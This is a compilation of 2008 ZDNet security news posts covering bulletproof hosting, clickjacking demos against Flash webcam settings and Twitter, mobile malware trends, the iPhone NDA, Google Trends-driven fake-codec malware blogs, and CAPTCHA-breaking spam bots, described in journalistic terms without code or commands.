Do bullet-proof cybercrime friendly providers have a future? Naturally, since it’s the simple market forces that are going to keep both fronts busy for years to come. With ATRIVO/Intercage now shut down, what’s next? Lessons learnt for the bad guys realizing that it’s about time they start taking advantage of basic OPSEC (operational security) processes like decentralizing their networks, and increasing the lifecycle of their customer’s cybercrime activities by taking advantage of fast-fluxing. The bottom line, despite that Intercage remains offline, but the concepts of cybercrime content hosting, and the Russian Business Network as a franchise, are always going to be there.

[Source: zdnet]

Webcam hijack demo highlights clickjacking threat

Clickjacking demos highlight severity of cross-browser threat[ UPDATE: The details are out. Lots of unresolved clickjacking issues]

A security researcher in Israel has released a demo of a “clickjacking” attack, using an JavaScript game to turn every browser into a surveillance zombie.

The release of the demo follows last month’s partial disclosure of the cross-platform attack/threat, which affects all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

[ SEE: Clickjacking: Scary new cross-browser exploit]

In Guy Aharonovsky’s demo game, a Web page is set up to seamlessly hide another page in the background that’s actually managing the target’s Adobe Flash Player privacy settings manager.

Using a series of clicks bouncing around the rigged page, Aharonovsky is able to silently hijack the user’s clicks to modify the Flash privacy settings and take complete control of the installed webcam.

The wet dream of every private eye and peeping tom. Imagine this scenario, you play a short game on the web and by doing that you unknowingly grant someone full access to your webcam and microphone.

If you don’t want to try it or don’t have a webcam connected, you can see the attack in action in this YouTube video.

[ SEE: Firefox + NoScript vs Clickjacking ]

Aharonovsky’s harmless demo game is a perfect example of how clicks on one Web page can actually apply to clicks on page that’s invisible to the end user. The webcam hijack could have been used, for example, with live streaming sites like UStream or JustinTV to create a malicious surveillance platform, he explained.

The demo was done in the form of a JavaScript game but Aharonovsky warns that a Flash, Java, SilverLight, DHTML game or application can be used to achieve the same thing.

Some of the clicks are real game clicks other are jacked clicks. Every time the click is needed to be jacked the content simply move behind the iframe using z-index.

I had doubts about publishing this, but, if I could have understand it so are the bad guys, so it’s better to know about it.

Aviv Raff, a security researcher with expertise in browser hacking, has also built a proof-of-concept exploit using a hidden iFrame to hijack clicks to snag Twitter followers.

Raff’s demo invisibly overlays a blank page over the Twitter site and sets the”Click Me!” button on the spot where Twitter’s “Follow” icon is displayed. If the target is logged into Twitter, the click on Raff’s demo is actually executed on Twitter’s site.

The ramifications for this is truly scary and, as Google browser security guru Michal Zalewski explains, difficult to fix.

If you expand the idea behind these clickjacking demos, you can see how this can be exploited to make it easier to launch drive-by malware download using social engineering techniques.

Until the affected vendors can come up with adequate patches/mitigations, Web surfers might want to follow Jeremiah Grossman’s advice and move to Firefox + NoScript to get some level of security.

[Source: zdnet]

Talkback Tuesday: Mobile Malware

Last week I wrote two posts about why I was not concerned about mobile malware right now, but I expected mobile malware to become a problem in the near future. There were several responses to the two posts, including the following:

Phatkat writes:

Most crackers (hackers gone bad) are doing this for monetary gain so like most people want to put the minimal amount effort to get the maximum gain. Mobile devices are such a nice diverse group of devices that crackers haven’t found the “maximum economic benefit” cracking at one type of mobile device.

I 100% agree with this statement, particularly when we define mobile malware as being an endemic security threat. There will always be proof-of-concept attacks against one platform or another, but the point in time where you have to worry is when real money and real time is being lost.

More importantly, there are plenty of security threats associated with mobile devices that have nothing to do with malware. Any CSO worth his salt should prioritize real, quantifiable threats over imaginary ones. Of the real threats, data leakage prevention is probably the biggest sector that comes to mind. Dealing with lost sensitive corporate data is a real security problem that requires real technology to handle. The present problems may not be as sexy as computer viruses, but they are problems that do need to be solved.

[Source: zdnet

Dropping the iPhone NDA is good for security

Last week Apple lifted their NDA on iPhone developers, freeing them to discuss amongst themselves how to properly build applications. This decision is a “good thing” for not just applications but also application security on the iPhone.

The iPhone NDA was antithetical to how developers work. Developers learn from code snippets and design patterns. They rarely invent functions from scratch, and will look at how previous applications were built to decide how to build their current projects. This isn’t because developers are unimaginative, but because they recognize there are a million ways of doing something but only a handful are efficient, effective, and ultimately won’t cause a security event that will bite you in the rear somewhere down the road.

Over the past decade, developers and security consultants have worked to fix millions of lines of code that were created without an understanding of their possible security implications. Software vulnerabilities with names like “buffer overflow” and “double free” are the result of improper coding practices. The software development community started to produce programming guides that contained code describing the right and wrong way of handing C strings, SQL queries, and cryptography. Without this open discussion, we would still be fighting basic programming flaws in widespread binaries, which is something that has largely slowed down several years ago.

I don’t know if there are any programming flaw syndromes that are already present in iPhone applications. I would be surprised if there were any, given the programming language used for iPhone apps as well as their use profile. If flaws were to come up, though, having an NDA on programming techniques would make the flaws far more difficult to repair.

[Source: zdnet]

Cybercriminals syndicating Google Trends keywords to serve malware

Google TrendsIn an underground ecosystem that is anything but old fashioned when it comes to abusing legitimate web services, cybecriminals have started exploiting the traffic momentum, and by monitoring the peak traffic for popular search queries using Google’s Trends, are syndicating the keywords in order to acquire the traffic and direct it to malware serving blogs primarily hosted at Windows Live’s Spaces.

According to a recent advisory issued by Webroot :

“For the first time, hackers are capitalizing on the top news stories from Google Trends Labs, which lists the day’s most frequently searched topics, which can include news of the Wall St. bail out or the presidential campaign,” said Paul Piccard, director of Threat Research, Webroot. “These highly relevant news stories and videos are being posted to the hackers’ fake blogs to increase the site’s Google search rankings.

These fraudulent blogs contain several video links about the news story for which the users were originally searching. Once a user clicks on one of the video links, they are prompted to download a video codec that downloads a rogue antispyware program designed to goad the user into purchasing an illegitimate program that may put their personal information and data at even greater risk. “

Let’s take a sample, and confirm the ongoing syndication of popular keywords in order to attract traffic to the several hundred malware serving blogs.

Search keywords blackhat SEO malwareA random keyword “on fire” like gwen ifill wheelchair indicates that 55 minutes ago a malware serving blog has been successfully crawled and is now appearing within the first 10 results thanks to the high page rank of Windows Live Spaces. Upon clicking the link, the user is exposed to the typical ActiveX Object Error message that is attempting to trick them into installing TrojanDownloader:Win32/Zlob.AMV with 10 out of 36 AV scanners currently detecting it (27.78%).

Rogue blogs blackhat SEO malwareMoreover, in order to ensure that their fake blogs will get crawled in the shortest time frame possible so that they can better abuse the momentum peak of the search query, they’re naturally taking advantage of the pre-registered blogs at popular blogging platforms which Google is crawling literally in real-time. Syndicating this particular keyword in order to serve malware is not an isolated event, with several hundred currently active blogs doing exactly the same as soon as Google Trends refreshes its hourly feed.

Fake codec ZlobMalware campaigns have been taking advantage of pure SEO (search engine optimization), and mostly blackhat SEO techniques, during the entire 2008. The difference between the ongoing campaign and previous ones, is that the current approach has a higher probability of attracting generic search traffic since it’s relying on the world’s most popular search engine to tip them on what has the world been searching for during the past hour.

[Source: zdnet]

Well, I do actually worry (about mobile viruses)

In response to Kaspersky’s statement that they were concerned about mobile malware, I provided a flurry of reasons why mobile malware epidemics don’t occur today. This may not be the case in the near future, however, as changes in the handset space is making the creation of malware far more attractive.

Consumers lusting over the iPhone are driving changes in the handset space that will make the platforms far more attractive for malware authors. Over the next few years, we will see nearly every phone with high quality displays and effective browsers, running operating systems that can support third party applications. Customers will want to use these features; financial institutions, such as Bank of America, are responding by adding mobile features to their websites. Handsets that support these features are more expensive, and will end up being in use far longer, accumulating bugs along the way. And finally, the malware landscape is becoming increasingly competitive on the PC side, which will force malware authors to find fertile ground. The only piece missing is an effective monetization strategy for mobile malware (say that three times fast) that would make the labor profitable.

My thoughts about mobile malware are very similar to those about mac malware. It isn’t a problem now, but if current trends continue it will be a problem in the future. It is not a question of if, but when, and those of us who are responsible for keeping our systems and handsets clean have to be prepared.

[Source: zdnet]

Spammers attacking Microsoft’s CAPTCHA — again

Microsoft CAPTCHA brokenNever let a human do a malware infected host’s CAPTCHA recognition job. On their way to abuse the DomainKeys verified server reputation in order increase the probability of their spam emails reaching the receipts, spammers and malware authors are once again attempting to break Microsoft’s “revisited” CAPTCHA, and are able to sign up Live Hotmail accounts with a success rate of 10% to 15%, according to an assessment published by Websense today :

“Spammers are once again targeting Microsoft’s Hotmail (Live Hotmail) services. We have discovered that spammers, in a recent aggressive move, have managed to create automated bots that can sign up for and create random Hotmail accounts, defeating Microsoft’s latest, revised CAPTCHA system. The accounts are then used to send mass-mailings.

Early this year (2008), as reported by Websense Security Labs, spammers worldwide basis demonstrated their adaptability by defeating a range of anti-spam services offered by security vendors by carrying out the streamlined anti-CAPTCHA operations on Microsoft’s Live Mail, Google’s Gmail, Microsoft’s Live Hotmail, Google’s Blogger, and Yahoo Mail.”

CAPTCHA Email10% to 15% recognition rate or “one in every 8 to 10 attempts to sign up for a Live Hotmail account is successful” as stated by Websense, is a bit of a modest success rate given that the academic community has managed to achieve 92% recognition rate in the past. But with hundreds of thousands of malware infected hosts, it appears that they are willing to allocate resources despite the modest success rate, and are actively spamming through the newly registered bogus email accounts.

Is machine learning CAPTCHA breaking the tactic of choice, or is the recently uncovered CAPTCHA solving economy the outsourcing model cost-effective enough to undermine the machine learning approach? With low-waged humans achieving a 100% recognition rate and processing “bogus account registration” orders, it may in fact be more cost-effective for a cybercriminal to outsource the process, than allocating personal resources and achieving a lower success rate. One thing’s for sure - CAPTCHA based authentication has been persistently under attack from all fronts, during the entire 2008.

[Source: zdnet]